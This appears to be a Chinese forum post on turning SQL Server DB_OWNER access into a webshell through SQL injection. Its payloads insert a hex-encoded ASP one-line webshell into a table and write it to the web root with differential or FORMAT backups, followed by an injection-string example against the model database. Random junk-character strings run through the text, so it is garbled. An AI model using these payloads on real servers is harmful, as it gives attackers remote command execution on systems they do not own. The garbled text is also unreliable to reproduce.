DB_OWNER权限得到webshell的两点改进:: {: I9 w9 t6 Y/ ^
) r7 z1 L. V" f h/ A
减少备份文件大小,得到可执行的webshell成功率提高不少
% F. x/ `; o; F/ m, a5 P一利用差异备份
4 N0 I4 ^! z" S1 q/ _ h加一个参数WITH DIFFERENTIAL
! f0 Y' [* K3 M+ k$ g! H% E6 }
( z7 h0 g w6 y& z/ Z' m3 {0 q1" } S* A3 x k1 X6 J
2
4 T) d9 _0 |1 U- v+ e: ~3
0 M( O# g) a# E8 M0 _3 F4
! G3 Z# I5 L- M declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s2 J2 G' G) o. I9 i6 V4 U- J
create table [dbo].[xiaolu] ([cmd] [image]);- |, q1 Y n4 P
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
8 N9 a1 g+ a: j* ]7 kdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
9 E) ^2 n- Z, {0 H
A' j' K) t- b2 o二利用完全FORMAT0 n- O$ R0 T! J: |6 H+ S" z0 d( O1 K
加一个参数WITH FROMAT
' _! D9 o# q' M! Q8 b2 Z有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以! [! f5 T3 z- H/ g* w4 y
# ?0 B7 m4 l9 q# ?
1
1 ^6 c, {9 g# R+ J2
* I7 v! Z5 [" {7 m34 j' m4 d, ~$ I9 Z! \4 n; [
4
7 U' ]( r' r, S declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s- y! Q' k6 U! K
create table [dbo].[xiaolu] ([cmd] [image]);" R9 U- `1 s! U, N* b- u1 e4 {
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
, N: b' p. w# |+ m! g" M: [2 l! Udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
' K& P) A0 k1 v$ d/ o
8 C2 M* P6 t, Z [/ `总的来说就是那么简单几句,下面以备份数据库model为例子7 K6 d2 m, k7 z9 W& [( j
1) B+ }8 |% b7 u6 \3 U1 v
- D0 n$ F; u1 q13 C; B2 J" F- l) ~
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
e G- i# J* S, u& z2 e$ z
g X- _1 }8 I& b2; Z" D6 c" |5 i/ Y" S [5 H8 W
8 v: a- Y* A% ?! o! O1
0 E7 C: g3 U! _. D$ g5 W id=1;backup database model to disk='你的路径‘ with differential,format;-- 6 t ~( ^0 {3 N+ I; `. O6 L
|